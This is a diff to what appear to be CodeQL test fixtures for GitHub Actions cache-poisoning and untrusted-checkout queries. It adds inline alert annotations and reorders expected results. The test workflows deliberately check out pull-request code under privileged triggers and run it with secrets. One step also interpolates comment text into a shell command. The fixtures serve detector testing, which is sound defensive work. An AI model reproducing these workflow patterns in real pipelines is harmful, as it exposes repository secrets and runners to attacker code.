b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml index 05f8e4a067a1..d99592c830f9 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml @@ -12,9 +12,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - run: ./checkedout/poison + - run: ./checkedout/poison # $ Source[actions/cache-poisoning/poisonable-step] - pr-comment2: + pr-comment2: # $ Alert[actions/cache-poisoning/poisonable-step] runs-on: ubuntu-latest permissions: read-all steps: @@ -23,9 +23,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: ./.github/actions/node-npm-setup + - uses: ./.github/actions/node-npm-setup # $ Source[actions/cache-poisoning/poisonable-step] - pr-comment3: + pr-comment3: # $ Alert[actions/cache-poisoning/poisonable-step] runs-on: ubuntu-latest permissions: read-all steps: @@ -34,4 +34,4 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - run: node .github/actions-scripts/what-docs-early-access-branch.js + - run: node .github/actions-scripts/what-docs-early-access-branch.js # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml index 60ba26406c62..60be3c02edb0 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml @@ -17,11 +17,11 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages + - name: Setup Pages # $ Source[actions/cache-poisoning/poisonable-step] uses: actions/configure-pages@v5 - name: Build with Jekyll uses: actions/jekyll-build-pages@v1 with: source: ./ - destination: ./_site + destination: ./_site # $ Alert[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml index 8539bf2bda43..7ceb82a536f1 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml @@ -16,4 +16,4 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: npm run build -w www + - run: npm run build -w www # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml index 6e2351c17446..33d28c1f292d 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml @@ -15,4 +15,4 @@ jobs: with: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: ./foo + - run: ./foo # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml index 9742bd01a48a..082585088b1d 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml @@ -19,10 +19,10 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages + - name: Setup Pages # $ Source[actions/cache-poisoning/poisonable-step] uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - name: Build with Jekyll uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 with: source: ./ - destination: ./_site + destination: ./_site # $ Alert[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index 9cfac091f675..be669230722c 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | provenance | | nodes @@ -6,5 +8,3 @@ nodes | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | | .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select -| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref index 8ac48aad93e0..62a04c8718c8 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref @@ -1,2 +1,2 @@ -Security/CWE-349/CachePoisoningViaCodeInjection.ql - +query: Security/CWE-349/CachePoisoningViaCodeInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index 4cc8536b5943..4014714be4b7 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected @@ -1,3 +1,10 @@ +#select +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | | .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | @@ -43,10 +50,3 @@ edges | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | -#select -| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref index 9d1910990fc0..0002f755786f 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref @@ -1,2 +1,2 @@ -Security/CWE-349/CachePoisoningViaDirectCache.ql - +query: Security/CWE-349/CachePoisoningViaDirectCache.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index 6b1a3e873134..57a1fd7b8d87 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected @@ -1,3 +1,11 @@ +#select +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | | .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | @@ -43,11 +51,3 @@ edges | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | -#select -| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | -| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref index 89db21d70f59..9855767d1a86 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref @@ -1,2 +1,2 @@ -Security/CWE-349/CachePoisoningViaPoisonableStep.ql - +query: Security/CWE-349/CachePoisoningViaPoisonableStep.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml index a4acd7387660..abea1002fd38 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml @@ -55,9 +55,9 @@ jobs: with: submodules: recursive ref: ${{ fromJson(steps.issue.outputs.result).ref }} - - run: bash comment_example/tests.sh + - run: bash comment_example/tests.sh # $ Source[actions/untrusted-checkout-toctou/critical] - test3: + test3: # $ Alert[actions/untrusted-checkout-toctou/critical] if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} runs-on: ubuntu-latest steps: @@ -65,4 +65,4 @@ jobs: with: submodules: recursive ref: "refs/pull/${{ github.event.number }}/merge" - - run: bash comment_example/tests.sh + - run: bash comment_example/tests.sh # $ Alert[actions/untrusted-checkout-toctou/critical] Source[actions/untrusted-checkout-toctou/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml index a4acd7387660..abea1002fd38 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml @@ -55,9 +55,9 @@ jobs: with: submodules: recursive ref: ${{ fromJson(steps.issue.outputs.result).ref }} - - run: bash comment_example/tests.sh + - run: bash comment_example/tests.sh # $ Source[actions/untrusted-checkout-toctou/critical] - test3: + test3: # $ Alert[actions/untrusted-checkout-toctou/critical] if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} runs-on: ubuntu-latest steps: @@ -65,4 +65,4 @@ jobs: with: submodules: recursive ref: "refs/pull/${{ github.event.number }}/merge" - - run: bash comment_example/tests.sh + - run: bash comment_example/tests.sh # $ Alert[actions/untrusted-checkout-toctou/critical] Source[actions/untrusted-checkout-toctou/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml index 9444ad0b627c..937f223a5a2f 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml @@ -82,8 +82,8 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup + - name: Environment setup # $ Source[actions/untrusted-checkout-toctou/critical] uses: ./.github/actions/setup-env with: - azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} # $ Alert[actions/untrusted-checkout-toctou/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml index e3e557cc5112..5cd25eb52cba 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml @@ -90,7 +90,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get environment from comment + - name: Get environment from comment # $ Source[actions/untrusted-checkout-toctou/critical] id: environment shell: bash env: @@ -153,7 +153,7 @@ jobs: with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} - - name: Deploy server + - name: Deploy server # $ Alert[actions/untrusted-checkout-toctou/critical] if: >- ${{ (contains(github.event.comment.body, '/deploy to') || @@ -166,7 +166,7 @@ jobs: COMMENT_BODY: ${{ github.event.comment.body }} run: poetry run python server.py --endpoint_location=remote --autodeploy=True - - name: Deploy scorer + - name: Deploy scorer # $ Alert[actions/untrusted-checkout-toctou/critical] if: >- ${{ contains(github.event.comment.body, '/deploy as async scorer') || @@ -177,7 +177,7 @@ jobs: PR_NUMBER: ${{ github.event.issue.number }} run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True - - name: Set latest commit status as ${{ job.status }} + - name: Set latest commit status as ${{ job.status }} # $ Alert[actions/untrusted-checkout-toctou/critical] uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 if: always() with: diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml index 4a6d1452af24..bf14336adb66 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml @@ -44,7 +44,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Install GH CLI + - name: Install GH CLI # $ Alert[actions/untrusted-checkout-toctou/high] uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 - name: Check comment keywords @@ -94,7 +94,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Log into Azure + - name: Log into Azure # $ Alert[actions/untrusted-checkout-toctou/high] uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 with: creds: ${{ secrets.AZURE_CREDENTIALS }} @@ -164,7 +164,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get pipeline info from comment + - name: Get pipeline info from comment # $ Source[actions/untrusted-checkout-toctou/critical] id: pipeline-info run: | model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ @@ -215,13 +215,13 @@ jobs: with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} - - name: Kickoff run + - name: Kickoff run # $ Alert[actions/untrusted-checkout-toctou/critical] if: contains(github.event.comment.body, '/kickoff') env: BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} - - name: Set latest commit status as ${{ job.status }} + - name: Set latest commit status as ${{ job.status }} # $ Alert[actions/untrusted-checkout-toctou/critical] uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 if: always() with: diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index da66ff822a39..cf212950f1e2 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -1,3 +1,14 @@ +#select +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | edges | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | | .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | @@ -96,14 +107,3 @@ edges | .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:224:7:232:4 | Uses Step | | .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | | .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | 